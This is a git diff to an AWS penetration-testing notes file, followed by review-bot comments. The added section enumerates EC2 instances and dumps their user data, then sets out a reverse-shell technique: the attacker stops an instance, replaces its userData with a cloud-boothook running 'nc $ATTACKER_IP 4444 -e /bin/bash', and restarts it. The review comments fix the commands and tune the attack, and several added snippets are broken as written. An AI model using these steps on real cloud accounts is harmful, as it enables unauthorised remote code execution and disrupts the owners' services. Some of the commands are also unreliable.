diff --git a/Enumeration/AWS.md b/Enumeration/AWS.md index 560a320..eb7251d 100644 --- a/Enumeration/AWS.md +++ b/Enumeration/AWS.md @@ -700,6 +700,27 @@ Deploy service instances of Virtual machines inside a VPC. Deployment EC2 instances into 26 regions. Supports multiple OSs. On-demand billing. +#### Enumerate EC2 Instances + +List EC2 instances in the account via aws cli. + +```sh +aws ec2 describe-instances --query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json +``` +List all InstanceIds in the account via aws cli. + +```sh +list=$(aws ec2 describe-instances --region --query Reservations[].Instances.InstanceId --output json --profile PROFILENAME) | jq .[] -r +``` + +Get user data like cloud-init scripts from the instances via aws cli. + +```sh +for i in $list;do + aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData --region | base64 -d | > $i-userdata.txt +done +``` + #### Connect to an EC2 Instance Connect to the instance using SSH, RDP, SSM, serial console or webconsole. 
@@ -725,6 +746,42 @@ Instance Connect and the SSM Session Manager can be used to reset the root password via `sudo passwd root`. After that it is possible to connect to the root user, e.g. using serial console or just use `sudo su root` or `su root` directly. +##### Connect to an EC2 Instance Using a Reverse Shell + +The InstanceId has to be known, watch [Enumerate EC2 Instances](#Enumerate-EC2-Instances) to get these IDs. + +Stop the machine using the InstanceId through aws cli. + +```sh +aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID +``` + +Creat a cloud-init script which contains the reverse shell. The file should contain somethin like the following example, so it will executed at boot time. + +```sh +#cloud-boothook +#!/bin/bash -x +apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash +``` + +Encode the shellscript via base64. + +```sh +base64 rev.txt > rev.b64 +``` + +Upload the encoded file to the stopped instance via aws cli. + +```sh +aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64 +``` + +Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to catch up. + +```sh +aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID +``` + #### EC2 and IAM EC2 instances can use nearly any other service provided by AWS. @@ -925,3 +982,4 @@ List available load-balancers via aws cli. ```sh aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text ``` +
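Review bot: the three shell snippets in the new "Enumerate EC2 Instances" section (hunk `@@ -700,6 +700,27 @@`) do not run as written. The first `--query` has an unbalanced `]`: the multi-select list needs an opening bracket, e.g. `` Instances[*].[Tags[?Key==`Name`].Value|[0],InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress] ``. The second and third snippets pass `--region` without a value, so the CLI consumes the following token (`--query`) as the region name; either drop `--region` or give it a value. In the second snippet `Reservations[].Instances.InstanceId` should be `Reservations[].Instances[].InstanceId`, and `list=$(...) | jq .[] -r` pipes nothing because the assignment completes in a subshell before the pipe, leaving `list` as raw JSON; write `list=$(aws ec2 describe-instances --query 'Reservations[].Instances[].InstanceId' --output json --profile PROFILENAME | jq -r '.[]')`. In the third snippet `| base64 -d | > $i-userdata.txt` has a stray pipe before the redirect, so nothing is written to the file; it should read `| base64 -d > $i-userdata.txt`, and `--query UserData.Value` makes the intent of extracting the base64 string explicit.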
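Review bot: the steps in the new "Connect to an EC2 Instance Using a Reverse Shell" subsection (hunk `@@ -725,6 +746,42 @@`) are missing the caveat that `stop-instances` is disruptive (downtime and loss of instance-store data) and that `modify-instance-attribute --attribute userData` overwrites whatever user data the instance already had; the text should tell the reader to save the existing value first (the `describe-instance-attribute ... --attribute userData` loop added in the previous hunk does exactly that) and to restore it afterwards. The heading link `[Enumerate EC2 Instances](#Enumerate-EC2-Instances)` will not resolve on GitHub, which lower-cases generated anchors; use `#enumerate-ec2-instances` and "see" rather than "watch". Also fix the typos "Creat" (Create), "somethin" (something) and "so it will executed" (so it will be executed).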
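Review bot: the last hunk (`@@ -925,3 +982,4 @@`) only appends an empty line after the final code fence, leaving a trailing blank line at the end of AWS.md; drop it so the file ends with the closing fence and a single newline.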